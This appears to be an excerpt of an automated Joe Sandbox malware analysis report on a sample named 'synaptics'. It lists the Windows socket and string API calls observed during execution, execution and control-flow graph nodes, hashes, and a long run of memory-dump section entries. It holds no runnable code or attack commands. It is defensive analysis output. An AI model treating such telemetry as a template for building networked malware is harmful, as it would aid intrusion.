                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca9a000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: field 'args' is required for AsyncFunctionDef$field 'args' is required for FunctionDef$field 'name' is required for AsyncFunctionDef$field 'name' is required for FunctionDef
                                                                                                                                                                                                                                    • API String ID: 0-3677904104
                                                                                                                                                                                                                                    • Opcode ID: 1d7d1b011cacb43ecc1d45039c262a2b88c60e55ecfa6b3c862b7681abf2c988
                                                                                                                                                                                                                                    • Instruction ID: 2fef30cc151f3b3c5f4b158e3fcbba30e00624ccf75808d98f9d18a86213ea2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d7d1b011cacb43ecc1d45039c262a2b88c60e55ecfa6b3c862b7681abf2c988
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0416CB5A143008FD304CF59D941A16BBF6EF88364F1586AAE8589B7A1E730EC45CB92

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:0.3%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:16.1%
                                                                                                                                                                                                                                    Total number of Nodes:56
                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                    execution_graph 43055 6c71b890 WSASetLastError send 43056 6c71b8bb 43055->43056 43057 73fc407e 43058 73fc4081 WSASocketW 43057->43058 43059 73fc3f13 43057->43059 43058->43059 43060 73fc2730 43061 73fc2760 43060->43061 43062 73fc2740 closesocket 43060->43062 43062->43061 43064 73fc5c50 WSAStartup 43065 73fc5c88 43064->43065 43066 73fc2650 43068 73fc268b 43066->43068 43067 73fc270b 43068->43067 43069 73fc26b1 bind 43068->43069 43070 73fc26ce 43069->43070 43071 73fc5210 43072 73fc529d 43071->43072 43073 73fc5408 getaddrinfo 43072->43073 43074 73fc5428 43072->43074 43073->43074 43075 73fc2390 43077 73fc23a5 43075->43077 43076 73fc23d1 43077->43076 43079 73fc1100 43077->43079 43080 73fc1111 ioctlsocket 43079->43080 43081 73fc1134 43080->43081 43081->43076 43082 6c71aca0 43088 6c7cd620 43082->43088 43084 6c71acd1 GetLastError 43086 6c71ace8 43084->43086 43085 6c71ad45 43089 6c7cd62d MultiByteToWideChar 43088->43089 43091 6c7cd6d6 MultiByteToWideChar 43089->43091 43092 6c7cd677 GetLastError 43089->43092 43096 6c7cd700 MultiByteToWideChar 43091->43096 43098 6c71acb1 43091->43098 43093 6c7cd6a8 GetLastError 43092->43093 43094 6c7cd686 MultiByteToWideChar 43092->43094 43093->43098 43094->43091 43094->43093 43096->43098 43098->43084 43098->43085 43099 6c819f90 TlsFree 43100 6c71b900 43101 6c71b964 43100->43101 43102 6c71b909 WSASetLastError recv 43100->43102 43103 6c71b930 43102->43103 43104 73fc3e4a 43105 73fc3f56 43104->43105 43107 73fc3e67 43104->43107 43106 73fc3fb7 getsockname 43105->43106 43105->43107 43106->43107 43108 73fc2440 43109 73fc2465 43108->43109 43110 73fc246c setsockopt 43109->43110 43111 73fc248b 43109->43111 43110->43111 43112 73fc2a80 43113 73fc2aba 43112->43113 43115 73fc2aeb 43113->43115 43116 73fc2810 43113->43116 43117 73fc2823 connect 43116->43117 43118 73fc283b 43117->43118 43118->43115

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 278 6c71b900-6c71b907 279 6c71b964-6c71b967 278->279 280 6c71b909-6c71b929 WSASetLastError recv 278->280 281 6c71b930-6c71b935 280->281 282 6c71b937-6c71b942 281->282 283 6c71b94f 281->283 286 6c71b954-6c71b958 282->286 287 6c71b944-6c71b94c 282->287 284 6c71b951-6c71b953 283->284 286->284 288 6c71b95a-6c71b963 286->288 287->283
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 6C71B90C
                                                                                                                                                                                                                                    • recv.WS2_32(?,?,?,00000000), ref: 6C71B920
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastrecv
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2514157807-0
                                                                                                                                                                                                                                    • Opcode ID: 9c91d11cff488c816e3059c4c16020d38859149522a91847e23c3caa05f4192b
                                                                                                                                                                                                                                    • Instruction ID: 7e56899aa825b18015f1b3c835d88858482d154d60287877e4d8e5da6f156623
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c91d11cff488c816e3059c4c16020d38859149522a91847e23c3caa05f4192b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EF04673B0A630B7D7201A257D00B8B3F70AF86B29F090036FA04A7B50D320E85A82E5

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: bind
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1187836755-0
                                                                                                                                                                                                                                    • Opcode ID: 675ed69a0ace4552a9001c773423b2f1cf3cadf5686fa358954c2edb45e65c5c
                                                                                                                                                                                                                                    • Instruction ID: aac5ec9aa5d52b7c4ca8094364c8d3937442ff5ad63ce20b1dc9768952458839
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675ed69a0ace4552a9001c773423b2f1cf3cadf5686fa358954c2edb45e65c5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8921C3327441459BDB10AB65ED85BABBBE8FF842A4F004166ED4EC7241EA31D81487E2

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,?,?,00000000), ref: 6C7CD66B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 6C7CD67D
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,00000000), ref: 6C7CD69C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 6C7CD6A8
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,?,?,00000000), ref: 6C7CD6FA
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,?,?,00000000), ref: 6C7CD720
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
